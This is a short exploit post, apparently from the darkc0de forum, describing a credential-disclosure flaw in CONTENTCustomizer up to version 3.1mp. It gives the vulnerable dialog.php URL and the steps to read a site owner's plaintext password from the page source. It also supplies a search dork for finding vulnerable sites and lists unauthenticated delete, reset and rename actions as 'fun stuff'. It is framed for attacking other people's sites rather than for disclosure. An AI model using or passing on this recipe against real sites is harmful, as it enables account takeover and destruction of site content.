CONTENTCustomizer <= v 3.1mp Login Credentials Disclosure Vulnerability

---------------------------------------
Author: d3hydr8
Homepage: darkc0de.com
Original Post: forum.darkc0de.com
---------------------------------------

Software: CONTENTCustomizer

Homepage: contentcustomizer.net

Version:  <= v 3.1mp

Vuln Page: /dialog.php?action=editauthor&doc='+pagename

Method: Find a site using ContentCustomizer, get a page name you want to
edit. (index.php)
Fill it in with our Vuln Page "
http://example.com/generator/dialog.php?action=editauthor&doc=index.php"
In the form you will see the Username: (owner of the file) but the password
is in asterisk's, View Source
The password will be in the value= field in plaintext.

<td nowrap><input type=password name=newlocalpassword value="PASSWORD"
id=newlocalpassword style="width:160px;"></td>

Trick: Hit Ctrl+Y on a page that ContentCustomizer controls and it brings
you to the login screen ;)


Dork:  inurl:"generator/default.php?doc="

Other fun stuff:

dialog.php?action=del&doc='+pagename  // Delete
dialog.php?action=delbackup&doc='+pagename  // Delete Backup
dialog.php?action=res&doc='+pagename // Reset
dialog.php?action=ren&doc='+pagename // Rename